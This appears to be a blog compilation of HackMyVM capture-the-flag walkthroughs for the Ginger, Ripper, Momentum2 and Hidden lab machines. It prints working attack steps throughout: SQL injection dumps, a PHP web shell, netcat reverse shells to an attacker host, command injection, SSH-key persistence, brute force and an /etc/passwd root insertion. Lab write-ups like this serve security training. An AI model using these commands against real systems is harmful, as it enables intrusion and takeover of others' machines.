HackMyVm Ginger Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ginger

Find IP of VM.

 ~ sudo arp-scan --interface eth1 192.168.56.0/24                                                         ...
 192.168.56.100  08:00:27:45:72:fc       PCS Systemtechnik GmbH

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
 |   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
 |_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 10701]
 /wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
 /latest.zip           (Status: 200) [Size: 16866701]

Scan vulnerability of wordpress.

 ~ wpscan --url http://192.168.56.100/wordpress/ -e ap --no-banner --api-token your_wpscan_token --force --plugins-detection aggressive
 ...
 [+] cp-multi-view-calendar
  | Location: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/
  | Last Updated: 2021-03-08T13:47:00.000Z
  | Readme: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
  | [!] The version is out of date, the latest version is 1.3.99
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/, status: 200
  |
  | [!] 2 vulnerabilities identified:
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
  |     Fixed in: 1.1.5
  |     References:
  |      - https://wpscan.com/vulnerability/50db43be-9fdb-4b5f-bba5-4c0d62689dbf
  |      - https://www.exploit-db.com/exploits/36243/
  |      - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli/
  |
  | [!] Title: CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
  |     Fixed in: 1.1.8
  |     References:
  |      - https://wpscan.com/vulnerability/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11
  |      - https://www.exploit-db.com/exploits/37560/
  |
  | Version: 1.0.2 (50% confidence)
  | Found By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt

Seach the exploit in exploitdb.

~ searchsploit CP Multi View Event Calendar                                                       fish-0 | 0 [14:21:49]
 ------------------------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                                       |  Path                           ------------------------------------------------------------------------------------- ---------------------------------
 WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection                   | php/webapps/35073.txt          
 WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection                  | php/webapps/37560.txt          
 ------------------------------------------------------------------------------------- ---------------------------------

Check 37560.txt, find the sql injection point, and use sqlmap to dump database.

 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5 --dbs --batch
 ...
 available databases [2]:
 [*] information_schema
 [*] wordpress_db
 ~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1'  -p id --risk 3 --level 5  -D wordpress_db -T wp_users --dump
 ...
 Table: wp_users
 [1 entry]
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | ID | user_url                      | user_pass                          | user_email          | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
 | 1  | http://192.168.0.14/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster  | 0           | webmaster    | webmaster     | 2021-06-02 05:28:40 | <blank>             |
 +----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Crack the password hash with john the ripper.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
 ~ john --show hash.txt            
 ?:sanitarium

Login wordpress with webmaster:sanitarium, in plugin editor, modify akismet.php, insert shell code.

image-20210609142750078.png

Visit the shell code and get reverse shell.

```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php

~ nc -nvlp 1234 ...
Ncat: Connection from 192.168.56.100:34762.
Linux ginger 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
08:28:31 up 14 min, 0 users, load average: 0.00, 0.05, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

 Found 3 users in /home.

www-data@ginger:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 May 21 16:30 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
drwxr-xr-- 5 caroline webmaster 4096 May 25 08:15 caroline
drwxr-xr-x 4 sabrina sabrina 4096 May 25 08:15 sabrina
drwx------ 4 webmaster webmaster 4096 May 25 08:15 webmaster

 Found hint of sabrina.

www-data@ginger:/home/sabrina$ cat password.txt
cat password.txt
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory

Get the password through dmesg.

www-data@ginger:/home/sabrina$ dmesg |grep sabrina
dmesg |grep sabrina
[ 6.040104] sabrina:dontforgetyourpasswordbitch

Log in ssh as sabrina, check sudo -l.

sabrina@ginger:~$ sudo -l
Matching Defaults entries for sabrina on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sabrina may run the following commands on ginger:
(webmaster) NOPASSWD: /usr/bin/python /opt/app.py *

Check app.py, it's http server with SSTI on port 5000.

 ```
sabrina@ginger:~$ cat /opt/app.py

 from flask import Flask, request, render_template_string,render_template

 app = Flask(__name__)
 @app.route('/')
 def hello_ssti():
     person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
     if request.args.get('name'):
         person['name'] = request.args.get('name')
     template = '''<h2>Hello %s!</h2>''' % person['name']
     return render_template_string(template,person=person)
 def get_user_file(f_name):
     with open(f_name) as f:
         return f.readlines()
 app.jinja_env.globals['get_user_file'] = get_user_file

 if __name__ == "__main__":
     app.run(debug=True)

Start the server as webmaster.

sabrina@ginger:~$ sudo -u webmaster python /opt/app.py *
  * Serving Flask app "app" (lazy loading)
  * Environment: production
    WARNING: This is a development server. Do not use it in a production deployment.
    Use a production WSGI server instead.
  * Debug mode: on
  * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
  * Restarting with stat
  * Debugger is active!
  * Debugger PIN: 260-511-262

In another terminal, use ssh to port forward port 5000.

 ~ ssh -L 5000:127.0.0.1:5000 sabrina@192.168.56.100

Visit the server with SSTI shell code.

```
127.0.0.1:5000/?name={{request.application.globals.builtins.import(%27os%27).popen('nc 192.168.56.150 1234 -e /bin/bash').read()}}

At the same time, use nc to listen to specific port, and get reverse shell as webmaster.

~ nc -nlvp 1234 fish-0 | 0 [14:34:52]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:34772.
id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)

Upload id_rsa.pub to /home/webmaster/.ssh, change name to authorized_keys and chmod 600.

 ```
webmaster@ginger:/home/sabrina$ cd /home/webmaster
 cd /home/webmaster
 webmaster@ginger:~$ mkdir .ssh
 mkdir .ssh
 webmaster@ginger:~$ cd .ssh
 cd .ssh
 webmaster@ginger:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 ...
 Saving to: ‘authorized_keys’
 authorized_keys     100%[===================>]     565  --.-KB/s    in 0s    
 webmaster@ginger:~/.ssh$ chmod 600 authorized_keys
 chmod 600 authorized_keys

Now we can login ssh as webmaster

~ ssh webmaster@192.168.56.100  
 ...
 webmaster@ginger:~$ id
 uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)

Upload pspy64 to VM and check it.

```
2021/06/09 04:33:01 CMD: UID=1002 PID=883 | /bin/sh -c bash ~/backup/backup.sh
2021/06/09 04:33:01 CMD: UID=1002 PID=884 | bash /home/caroline/backup/backup.sh

UID 1002 is user caroline, and the /home/backup folder is writable to webmaster.

drwxrwx--- 2 caroline webmaster 4096 May 22 13:38 backup

Write bash code into /home/caroine/backup/backup.sh.

 ```
webmaster@ginger:/home/caroline$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /tmp/backup.sh
 webmaster@ginger:/home/caroline$ rm backup/backup.sh          
 rm: remove write-protected regular file 'backup/backup.sh'? yes
 webmaster@ginger:/home/caroline$ cp /tmp/backup.sh backup/    

Then we get reverse shell as caroline. Again, upload id_rsa.pub and get ssh access. Check sudo -l.

caroline@ginger:~$ sudo -l
 Matching Defaults entries for caroline on ginger:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User caroline may run the following commands on ginger:
     (ALL : ALL) NOPASSWD: /srv/code

Disassemble code, it just calls chmod to make passwd writable in 5 seconds.

```
int __cdecl main(int argc, const char argv, const char envp)
{
system("chmod o+w /etc/passwd ; sleep 5 ; chmod o-w /etc/passwd");
return 0;
}

In 5 seconds, we write a new root user with password hash into file /etc/passwd.

caroline@ginger:/srv$ sudo /srv/code &
[1] 1220
caroline@ginger:/srv$ echo "root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash" >> /etc/passwd
caroline@ginger:/srv$ su root2
Password:
root@ginger:/srv# id;hostname
uid=0(root) gid=0(root) groups=0(root)
ginger
root@ginger:/srv#

HackMyVm Ripper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Ripper

Scan ports.

 nmap -sV -sC -p- 192.168.56.100  -oN ports.log
 ...
 PORT   STATE SERVICE VERSION            
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 57]
 /staff_statements.txt (Status: 200) [Size: 107]

Check staff_statements.txt. Old ssh connection files may mean id_rsa.bak.

```
cat staff_statements.txt
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.

Take care the screen of VM told us the user name jack.

image-20210603115519124.png

Download id_rsa.bak, try to connect ssh, it's encrypted.

wget http://192.168.56.100/id_rsa.bak
2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]

ssh jack@192.168.56.100 -i id_rsa.bak
Enter passphrase for key 'id_rsa.bak':

Use following code to brute force password.

cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C “jack@192.168.56.100” -P $pass -f id_rsa.bak &>/dev/null; then echo $pass; break; fi; done
bananas

Login as jack. After some enum, found nothing useful.

Download linpeas from github. Upload to VM.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

Run linpeas.sh, get a strange string.

[+] Hashes inside passwd file? ........... No
[+] Writable passwd file? ................ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
[+] Can I write in network-scripts? ...... No
[+] Can I read root folder? .............. No

It's the password of another user helder.

Download pspy64 from github(https://github.com/DominicBreuker/pspy), upload to VM, check system process.

2021/06/02 08:22:01 CMD: UID=0 PID=1205 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1206 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1207 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi

The bash code means, if /root/.local/helder.txt is equal to /home/helder/passwd.txt, then we can send a string (like XXX) to port 10000, and system will set SUID bit of /usr/bin/XXX.

So we make a symbolic link, and send port 10000 string "bash". After a minute, /usr/bin/bash has been set SUID.

helder@ripper:~$ln -s /root/.local/helder.txt ./passwd.txt
helder@ripper:~$echo bash |nc -nlvp 10000
listening on [any] 10000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43374
helder@ripper:~$ls -la /usr/bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash

Get root finally.

 ```
helder@ripper:~$/usr/bin/bash -p
 helder@ripper:~$id
 uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)

HackMyVm Momentum2 Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Momentum2

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log                                      sudo-0 | 0 [15:05:51]
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 15:05 CST
 Nmap scan report for localhost (192.168.56.99)
 Host is up (0.0013s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
 |   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
 |_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Momentum 2 | Index
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================                  
 /index.html           (Status: 200) [Size: 1428]
 /img                  (Status: 301) [Size: 314] [--> http://192.168.56.100/img/]
 /css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
 /ajax.php.bak         (Status: 200) [Size: 357]                                
 /ajax.php             (Status: 200) [Size: 0]                                  
 /manual               (Status: 301) [Size: 317] [--> http://192.168.56.100/manual/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]    
 /dashboard.html       (Status: 200) [Size: 513]                                    
 /owls                 (Status: 301) [Size: 315] [--> http://192.168.56.100/owls/]

Check ajax.php.bak. We need to set some parameter to upload php file.

 cat ajax.php.bak  
     //The boss told me to add one more Upper Case letter at the end of the cookie
    if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
        //[+] Add if $_POST['secure'] == 'val1d'
         $valid_ext = array("pdf","php","txt");
    }
    else{
         $valid_ext = array("txt");
    }
    // Remember success upload returns 1 ⏎    

Generate dic file of cookies.

 for c in {A..Z}; do echo '&G6u@B6uDXMq&Ms'$c >> cookie.txt; done

Create cmd.php with shell code in it.

 cat cmd.php                                                                                                                                                                                   fish-0 | 0 [21:02:13]
 <?php
 system($_GET["cmd"])
 ?>

Go to /dashboard.html, choose cmd.php, click upload, and capture the request with burpsuite.

[image-20210531210127178.png]

Send the request to Repeater, add cookie "admin=xxx", which we will bruteforce later, and add parameter "secure=val1d". Take care, it's not valid. If we click send now, response code will be 0, which means failed.

[image-20210531212540903.png]

Then send it to intruder, add §§ sign to admin=§xxxxx§.

[image-20210531213130392.png]

Set payload as cookie.txt we just generated.

image-20210531213158667 [image-20210531213158667.png]

Click start attack. Then we get the right cookie with response code 1.

[image-20210531213313743.png]

And cmd.php has been uploaded to /owls.

[image-20210531213353093.png]

Check if cmd.php works OK.

 ~ curl 'http://192.168.56.99/owls/cmd.php?cmd=id'    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

We can get reverse shell.

 curl 'http://192.168.56.99/owls/cmd.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'
 -------------------------------------------------------------------------------------------------------
 nc -nlvp 1234                                                                    fish-0 | 130 [15:44:34]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:37994.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

In athena's home folder, found password hint.

 www-data@momentum2:/home/athena$ cat password-reminder.txt
 cat password-reminder.txt
 password : myvulnerableapp[Asterisk]

Asterisk mark (*) means any character, we generate a dic.

```
crunch 16 16 -t myvulnerableapp@ > dic.txt
crunch 16 16 -t myvulnerableapp% >> dic.txt
crunch 16 16 -t myvulnerableapp, >> dic.txt
crunch 16 16 -t myvulnerableapp^ >> dic.txt

Bruteforce ssh with user name athena and this dic.

hydra -l athena -P dic.txt 192.168.56.99 ssh -f fish-0 | 0 [15:25:54]
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-31 15:26:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: athena password: myvulnerableapp*

Ssh login as athena, check sudo.

athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py

Run the py file, when asked for input seed, input shell code.

sudo python3 /home/team-tasks/cookie-gen.py
~ Random Cookie Generation ~
[!] for security reasons we keep logs about cookie seeds.
Enter the seed : ;nc 192.168.56.150 1234 -e /bin/sh;

Listen to the port just input at another terminal, and get root shell.

nc -nvlp 1234 man-0 | 0 [15:32:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:37992.
id
uid=0(root) gid=0(root) groups=0(root)

HackMyVm Hidden Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hidden

Scan ports.

 nmap -sV -sC -p- 192.168.56.99  -oN ports.log                                     sudo-0 | 0 [14:50:06]
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
 |   256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
 |_  256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Level 1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 cat 80.log                                                                         fish-0 | 0 [19:39:15]
 /index.html           (Status: 200) [Size: 392]

Check index.html, found a png file and some hints.

[image-20210531194036612.png]

     <body>
         <h1><center>Welcome to level 1</center></h1>
          <center><img src="decodethis_pls.png"></center>
     </body>
     <!-- format xxx.xxxxxx.xxx -->

The png is tic-tac-toe Cipher. Decode it online.

[image-20210531174854759.png]

Add sys.hidden.hmv to /etc/hosts. Scan port 80 again.

 gobuster dir -u http://sys.hidden.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o sys.hidden.hmv.log
 ...
 /users                (Status: 301) [Size: 316] [--> http://sys.hidden.hmv/users/]
 /members              (Status: 301) [Size: 318] [--> http://sys.hidden.hmv/members/]
 /index.html           (Status: 200) [Size: 282]
 /weapon               (Status: 301) [Size: 317] [--> http://sys.hidden.hmv/weapon/]

Scan /weapon.

 gobuster dir -u http://sys.hidden.hmv/weapon -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o weapon.log
 ...
 /index.html           (Status: 200) [Size: 0]
 /loot.php             (Status: 200) [Size: 0]

Fuzz loot.php.

 wfuzz -u 'http://sys.hidden.hmv/weapon/loot.php?FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
  ...
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000008724:   200        1 L      3 W        54 Ch       "hack"  

Check RCE.

 curl 'http://sys.hidden.hmv/weapon/loot.php?hack=id'                               fish-0 | 0 [18:08:52]
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Get reverse shell as www-data.

curl 'http://sys.hidden.hmv/weapon/loot.php?hack=nc%20192.168.56.150%201234%20-e%20/bin/bash'

 nc -nlvp 1234                                                                      fish-0 | 0 [18:05:18]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:39104.
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@hidden:/var/www/hidden/weapon$

Check sudo.

 www-data@hidden:/home$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on hidden:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on hidden:
     (toreto) NOPASSWD: /usr/bin/perl

Get shell as toreto.

www-data@hidden:/home/toreto$ sudo -u toreto perl -e 'exec "/bin/bash";'
 sudo -u toreto perl -e 'exec "/bin/bash";'
 toreto@hidden:~$ id
 id
 uid=1001(toreto) gid=1000(toreto) groups=1000(toreto)

Upload id_rsa.pub in /home/toreto/.ssh, and rename it to authorized_keys, chmod 600.

```
toreto@hidden:~$ pwd
pwd
/home/toreto
toreto@hidden:~$ mkdir .ssh
mkdir .ssh
toreto@hidden:~$ cd .ssh
cd .ssh
toreto@hidden:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
<http://192.168.56.150/id_rsa.pub -O authorized_keys
--2021-05-31 04:46:26-- http://192.168.56.150/id_rsa.pub
Connecting to 192.168.56.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [application/x-mspublisher]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
2021-05-31 04:46:26 (9.01 MB/s) - ‘authorized_keys’ saved [565/565]
toreto@hidden:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys

Then login ssh as toreto.

ssh toreto@192.168.56.99 fish-0 | 0 [19:42:48]
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hidden 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

---

 / ======= \
/ __________\

___
	_____		___

\=____/ Hack_MyVM - Hidden
/ """"""""""" \ -------------------
/ ::::::::::::: \
(____)

---

Congratulations!!! you have reached the last level!
Good Luck! 😉

Last login: Mon May 31 04:47:11 2021 from 192.168.56.150
toreto@hidden:~$

In /home/atenea/.hidden, found a dic file.

toreto@hidden:/home/atenea$ cd .hidden/
toreto@hidden:/home/atenea/.hidden$ ls -la
total 16
drwxr-xr-x 2 atenea atenea 4096 May 22 19:17 .
drwxr-xr-x 4 atenea atenea 4096 May 31 04:53 ..
-rw------- 1 toreto toreto 6170 May 22 19:11 atenea.txt

Bruteforce password of atenea.

hydra -l atenea -P atenea.txt 192.168.56.99 ssh -f nc-0 | 130 [19:29:55]
...
[STATUS] 161.00 tries/min, 161 tries in 00:01h, 401 to do in 00:03h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 225 to do in 00:02h, 16 active
[22][ssh] host: 192.168.56.99 login: atenea password: sys8423hmv

Login as atenea, check sudo.

atenea@hidden:~$ sudo -l
Matching Defaults entries for atenea on hidden:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User atenea may run the following commands on hidden:
(root) NOPASSWD: /usr/bin/socat

Get root shell using socat.

atenea@hidden:~$ sudo socat stdin exec:/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
hidden

Moee的下载地址是https://www.vulnhub.com/entry/moee-1,608/
难度评级是insane。
VirutalBox导入靶机，运行后扫描端口，开了22和80。

继续阅读 →

这是vulnhub里一个非常有意思的靶机，下载地址是https://www.vulnhub.com/entry/school-1,613/

这个靶机是Linux系统的，取得用户shell的难度是初级，但是取得root shell需要对wine运行的windows程序进行溢出攻击。

继续阅读 →